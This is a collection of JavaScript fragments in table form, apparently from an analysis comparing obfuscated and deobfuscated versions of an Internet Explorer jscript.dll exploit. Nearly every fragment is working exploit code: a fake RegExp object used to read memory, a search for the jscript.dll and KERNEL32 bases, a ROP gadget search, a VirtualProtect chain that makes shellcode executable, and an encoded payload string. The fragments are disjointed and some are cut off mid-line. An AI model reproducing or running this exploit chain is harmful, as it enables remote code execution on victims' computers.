| kZ065np7(PK4968+4,wnU86O+1); // rop gadget: ret | |
| kZ065np7(PK4968+32,wnU86O); // rop gadget: pop eax; ret | |
| kZ065np7(PK4968+36,wnU86O+1); // rop gadget: ret | |
| kZ065np7(PK4968+40,J56m55);// / virtual Protect Address | |
| kZ065np7(PK4968+44,aRc3wLj+u647wRR6); //// virtual protect return address (address shellcode) | |
| kZ065np7(PK4968+48,aRc3wLj+u647wRR6); ////lpAddress(address shellcode) | |
| kZ065np7(PK4968+52,(V9INZ9t.length*P7661n8l1));//dwSize (shellcode size) | |
| kZ065np7(PK4968+56,0x20);// flNewProtect PAGE_EXECUTION_READ | |
| kZ065np7(PK4968+60,PK4968-0x1000);// flOldProtect | |
| kZ065np7(Gf8770861L,PK4968); |
| S(aC + 4, av + 1); // rop gadget: ret | |
| S(aC + 4 + 4 + 0x18, av); // rop gadget: pop eax; ret | |
| S(aC + 4 + 4 + 0x1C, av + 1); // rop gadget: ret | |
| S(aC + 4 + 4 + 0x20, au); // virtual Protect Address | |
| S(aC + 4 + 4 + 4 + 0x20, O + h);//virtual protect return address (shellcode address) | |
| S(aC + 4 + 4 + 4 + 4 + 0x20, O + h); //lpAddress (shellcode address) | |
| S(aC + 4 + 4 + 4 + 4 + 4 + 0x20, (m.length * c));//dwSize (shellcode size) | |
| S(aC + 4 + 4 + 4 + 4 + 4 + 4 + 0x20, 0x40);//PAGE_EXECUTE_READWRITE | |
| S(aC + 4 + 4 + 4 + 4 + 4 + 4 + 4 + 0x20, aC - 0x1000); //oldprotect |
| var l = "\u614E\u4B74\u01c8\u0000\u0024\u0000\u0159\u0000\u0002\u0000\u0000\u0000\u0001\u0000\u0000\u0000\u0000\u0000" + "\u1E12\u0001\u1200\u0009\u0000\u740A\u1100\u770A\u0400\uFFEF\uFFFF\uFFF7\uFFFF\u0000\u0000\uFFFF\uFFFF\uEF04\uFFFF\uF7FF\uFFFF\u00FF\u0000\uFF00\uFFFF\u04FF\uFFEF\uFFFF\uFFF7\uFFFF\u0000\u0000\uFFFF\uFFFF\uEF04\uFFFF\uF7FF\uFFFF\u00FF\u0000\uFF00\uFFFF\u04FF\uFFEF\uFFFF\uFFF7\uFFFF\u0000\u0000\uFFFF\uFFFF\u0D03\u0000\u0000\u0000\u6F00\u0000\u0300\u000D\u0000\uFFF3\uFFFF\u0000\u0000\u0D03\u0000\uFE00\uFFFF\u00FF\u0000\u0400\uFFEF\uFFFF\u000B\u0000\u0000\u0000\uFFFF\uFFFF\u2B04\u0000\u0000\u0000\u0000\u0000\uFF00\uFFFF\u03FF\u000D\u0000\uFFF3\uFFFF\u000E\u0000\u0112\u0000\u0300\u000D\u0000\uFFF3\uFFFF\u0016\u0000\u0D03\u0000\u0B00\u0000\u0700\u0000\u0300\u000D\u0000\uFFF3\uFFFF\u001A\u0000\u0D03\u0000\u0B00\u0000\u0000\u0000\u0300\u000D\u0000\uFFFB\uFFFF\u0000\u0000\u0D03\u0000\uF300\uFFFF\u1BFF\u0000\u1500\u1312\u0000\u0300\u000D\u0000\uFFDF\uFFFF\u0000\u0000\u030C\u000D\u0000\uFFF0\uFFFF\u |
| var av = null; | |
| var ae = V(ap + 0x3C); | |
| var aw = ap + ae; | |
| var ax = V(aw + 0x1C); | |
| var ay = V(aw + 0x2C); | |
| for (var A = 0; A < ax && (av == null); A++) { | |
| var az = X(aq, ay + A - 0x54); | |
| if ((az & 0xFFFC) == 0xC358) { // ROP gadget = pop eax; ret | |
| av = ap + ay + A; | |
| continue; |
| function at(a) { | |
| var b = V(ap + 0x3C); | |
| var c = ar(b + 0x18 + 0x60); | |
| var f = ar(b + 0x18 + 0x60 + e); | |
| var g = ar(c + 0x18); | |
| var h = ar(c + 0x1C); | |
| var i = ar(c + 0x20); | |
| var j = ar(c + 0x24); | |
| for (nameIndex = 0; nameIndex < g; nameIndex++) { | |
| var k = ar(i + nameIndex * e); |
| var ae = V(Z + 0x3C); | |
| var af = ac(ae + 0x18 + 0x60 + (e * 2)); | |
| var ag = ac(ae + 0x18 + 0x60 + (e * 2) + e); | |
| var ah = "KERNEL32.dll"; | |
| var ai = false; | |
| for (var aj = af; aj < af + ag; aj += 5 * e) { | |
| var ak = ac(aj + 0x0C); | |
| var al = new Array(); | |
| var am = 0; | |
| while ((am = ad(ak++))) al.push(am); |
| var Z = V(O); // reads vftable pointer, from the Fake RegExp object | |
| Z = Z & 0xFFFF0000; | |
| do // locating jscript.dll module base | |
| if ((V(Z + 0x50) == 0x70207369) && \ //p si | |
| (V(Z + 0x54) == 0x72676f72) && \ // rgor | |
| (V(Z + 0x58) == 0x63206d61) && \ // c ma | |
| (V(Z + 0x5C) == 0x6f6e6e61)) break; // onna | |
| while (Z -= 0x10000); | |
| var ab = W(Z); |
| function S(a, b) { | |
| try { | |
| var S_array = [0x0077, 0x0110, 0x0000, 0x0000, 0x0000, \ | |
| ((b & 0xFF) << 8) | 0x03, \ | |
| (b & 0xFFFF00) >> 8, \ | |
| ((a & 0xFF) << 8) | (((b & 0xFF000000) >> 24) & 0xFF), \ | |
| (a & 0xFFFF00) >> 8, (0x07 << 8) | (((a & 0xFF000000) >> 24) & 0xFF)]; | |
| var c = String.fromCharCode.apply(null, S_array); | |
| Q.test(c); // calls fake RegExp.test() method. | |
| } catch (d) {} |
| var P = "\uFFFF\uFFFF\uFFFF\uFFFF\uFFFF\uFFFF" + n(0x0081, O); // regexp type | |
| for (var A = x; A >= H; A--) untracked[A] = null; | |
| for (var A = 0; A < 0x1000; A++) overlay[A][P] = 1; | |
| while (--H >= 0) try { | |
| if ((typeof untracked[H]) === "object") break; | |
| else untracked[H] = null; | |
| } catch (E) {} | |
| if (H == -1) throw new Error("Could not find fake RegExp."); | |
| else {} | |
| window.close(); |
| var M = (untracked[H].charCodeAt(((k - 4 + g) / c) + 1) << 16) | (untracked[H].charCodeAt((k - 4 + g) / c) + 2); | |
| // M points to the VAR.obj_ptr corresponding to the VAR in RegExpObj+0x48 | |
| // The memory at M is read, by creating fake VARs pointing to the addres in M (VAR.obj_ptr) | |
| var N = "\uFFFF\uFFFF\uFFFF\uFFFF\uFFFF\uFFFF" + n(0x0082, M); | |
| for (var A = x; A >= H; A--) untracked[A] = null; | |
| for (var A = 0; A < 0x1000; A++) overlay[A][N] = 1; | |
| while (--H >= 0) try { |